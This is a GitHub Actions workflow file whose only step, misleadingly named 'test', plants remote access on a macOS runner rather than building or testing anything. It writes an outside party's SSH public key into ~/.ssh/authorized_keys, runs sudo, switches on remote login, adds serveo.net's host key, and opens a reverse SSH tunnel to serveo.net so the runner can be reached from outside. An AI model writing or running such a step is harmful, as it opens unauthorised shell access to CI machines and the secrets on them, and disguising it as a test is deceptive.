name: arthritisthirtysexrunthisone
on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  workflow_dispatch:

jobs:
  build:
    runs-on: macos-14

    steps:
    #  - uses: actions/checkout@v4

      - name: test
        run: |
          echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+q1CwDeEQkNyeT491GmDA5hHdpLcmIKXIjOiUP5waucyo1N30/5TQ+qteqbml2R9m8jVQvOnCpWwnjA54ZnHV+Vku9lFVlfAV/T18ukqzzjJ9KGqSDXfttAgb4r5mWcPjfiV93PvELfNygisTOekNWwJYOFGW84FYLydrD8TE6eyQJpmvje4qckMY3UUI3EvNZvGwJ09TWTIZk3qV3At72gSZZvgbMo5eP2CvjtTHdXC+5kqXvf/5frhp00jgomPCboKfeLADNwoI5myV1wKGlO6pDdSrbzDEsbATFT+iUGN9gExHL6o2lgaTqbWsWLbrD9tPvZiHmLm3gIRapOAVWVWPqYU73UU5iGmhQpq6SuR6abnvTLZ8Um03nOC8KtyR/UcmtduhiYe1puVXT9pAv/8MdTCNPbd1+5KycGcGGdXGXzSQ8JLr9Sg5OFp5cq1M6Q/LKcUIWtrRsuZVMSApDA2zpkNESZqlFj0wW09D0qL8I+qE2vHh+GAaWj4hap8= astro@Mechinator" | tee ~/.ssh/authorized_keys
          whoami
          sudo -i
          sudo systemsetup -setremotelogin on
          echo "serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj" | tee ~/.ssh/known_hosts
          ssh -R 0:localhost:22 serveo.net
          
